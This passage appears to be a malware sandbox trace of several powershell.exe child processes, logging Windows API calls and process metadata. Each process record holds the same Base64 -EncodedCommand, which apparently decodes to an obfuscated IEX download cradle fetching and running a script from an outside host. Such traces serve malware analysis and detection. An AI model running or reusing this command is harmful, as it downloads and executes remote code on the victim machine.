	[0963.089] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x297320, TokenInformationLength=0x4, ReturnLength=0xcdaf8 | out: TokenInformation=0x297320, ReturnLength=0xcdaf8) returned 1
	[0963.091] DuplicateTokenEx (in: hExistingToken=0xe4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcdc58 | out: phNewToken=0xcdc58*=0x304) returned 1
	[0963.091] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcdaf8 | out: TokenInformation=0x0, ReturnLength=0xcdaf8) returned 0
	[0963.091] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x297350
	[0963.091] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x297350, TokenInformationLength=0x4, ReturnLength=0xcdaf8 | out: TokenInformation=0x297350, ReturnLength=0xcdaf8) returned 1
	[0963.092] CheckTokenMembership (in: TokenHandle=0x304, SidToCheck=0x2f6bc28*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcdc68 | out: IsMember=0xcdc68) returned 1
	[0963.092] CloseHandle (hObject=0x304) returned 1
	[0963.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.335] CoTaskMemAlloc (cb=0x804) returned 0x1b587690
	[0963.335] GetConsoleTitleW (in: lpConsoleTitle=0x1b587690, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0963.337] CoTaskMemFree (pv=0x1b587690) 
	[0963.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.958] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0963.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.958] CoTaskMemFree (pv=0x286130) 
	[0963.965] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0963.967] CoCreateGuid (in: pguid=0xcdd50 | out: pguid=0xcdd50*(Data1=0xb43b5899, Data2=0x4b88, Data3=0x4227, Data4=([0]=0xad, [1]=0x7c, [2]=0x87, [3]=0x2b, [4]=0x64, [5]=0xb3, [6]=0xcb, [7]=0xa1))) returned 0x0
	[0963.968] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0963.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.968] CoTaskMemFree (pv=0x286130) 
	[0966.580] WinSqmIsOptedIn () returned 0x0
	[0966.581] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0966.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.581] CoTaskMemFree (pv=0x286130) 
	[0966.584] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0966.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.584] CoTaskMemFree (pv=0x286130) 
	[0967.570] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0967.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.570] CoTaskMemFree (pv=0x286130) 
	[0967.572] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0967.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.572] CoTaskMemFree (pv=0x286130) 
	[0967.573] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0967.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.573] CoTaskMemFree (pv=0x286130) 
	[0968.923] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0968.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.923] CoTaskMemFree (pv=0x286130) 
	[0968.925] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0968.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.925] CoTaskMemFree (pv=0x286130) 
	[0968.927] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0968.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.927] CoTaskMemFree (pv=0x286130) 
	[0968.933] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0968.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.933] CoTaskMemFree (pv=0x286130) 
	[0970.184] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0970.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.184] CoTaskMemFree (pv=0x286130) 
	[0970.185] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0970.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.185] CoTaskMemFree (pv=0x286130) 
	[0970.185] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0970.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.185] CoTaskMemFree (pv=0x286130) 

Thread:
	id = 692
	os_tid = 0x15b8


Thread:
	id = 719
	os_tid = 0x1630


Thread:
	id = 1243
	os_tid = 0x11a8


Thread:
	id = 1252
	os_tid = 0x1c3c


Thread:
	id = 1309
	os_tid = 0x1d94


Thread:
	id = 1378
	os_tid = 0x1f58


Thread:
	id = 1568
	os_tid = 0x20c4


Thread:
	id = 1576
	os_tid = 0x2110

	[0815.269] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0893.023] RegCloseKey (hKey=0x2fc) returned 0x0
	[0893.023] RegCloseKey (hKey=0x304) returned 0x0
	[0893.023] RegCloseKey (hKey=0x300) returned 0x0

Thread:
	id = 1933
	os_tid = 0x2618


Process:
	id = "134"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5a6ed000"
	os_pid = "0x1514"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "32"
	os_parent_pid = "0x9ec"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 676
	os_tid = 0x1518

	[0433.683] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 691
	os_tid = 0x15b4


Thread:
	id = 718
	os_tid = 0x162c


Thread:
	id = 1337
	os_tid = 0x1e3c


Thread:
	id = 1341
	os_tid = 0x1e58


Thread:
	id = 1661
	os_tid = 0x22b8


Thread:
	id = 1718
	os_tid = 0x20ac


Process:
	id = "135"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5b741000"
	os_pid = "0x151c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 677
	os_tid = 0x1520

	[0436.457] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 724
	os_tid = 0x1648


Thread:
	id = 752
	os_tid = 0x170c


Thread:
	id = 1897
	os_tid = 0x2570


Thread:
	id = 1906
	os_tid = 0x25a4


Thread:
	id = 1952
	os_tid = 0x266c


Thread:
	id = 2067
	os_tid = 0x2448


Process:
	id = "136"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4f555000"
	os_pid = "0x1550"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 681
	os_tid = 0x1554

	[0454.729] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 804
	os_tid = 0x1064


Thread:
	id = 808
	os_tid = 0x8f4


Process:
	id = "137"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4ed63000"
	os_pid = "0x1574"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 686
	os_tid = 0x1578

	[0458.115] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 822
	os_tid = 0x15a8


Thread:
	id = 830
	os_tid = 0x10f0


Process:
	id = "138"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4df71000"
	os_pid = "0x15c4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 694
	os_tid = 0x15c8

	[0457.958] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 825
	os_tid = 0x10dc


Thread:
	id = 834
	os_tid = 0x1104


Process:
	id = "139"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4f17e000"
	os_pid = "0x1618"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 714
	os_tid = 0x161c

	[0458.015] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 824
	os_tid = 0x10e4


Thread:
	id = 833
	os_tid = 0x1128


Thread:
	id = 1896
	os_tid = 0x256c


Thread:
	id = 1905
	os_tid = 0x25a0


Thread:
	id = 1931
	os_tid = 0x2610


Thread:
	id = 2063
	os_tid = 0x8a4


Process:
	id = "140"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4d98c000"
	os_pid = "0x1634"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 720
	os_tid = 0x1638

	[0457.986] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0829.404] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0840.272] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0840.273] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0840.273] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0840.273] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0942.905] GetVersionExW (in: lpVersionInformation=0x10dec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
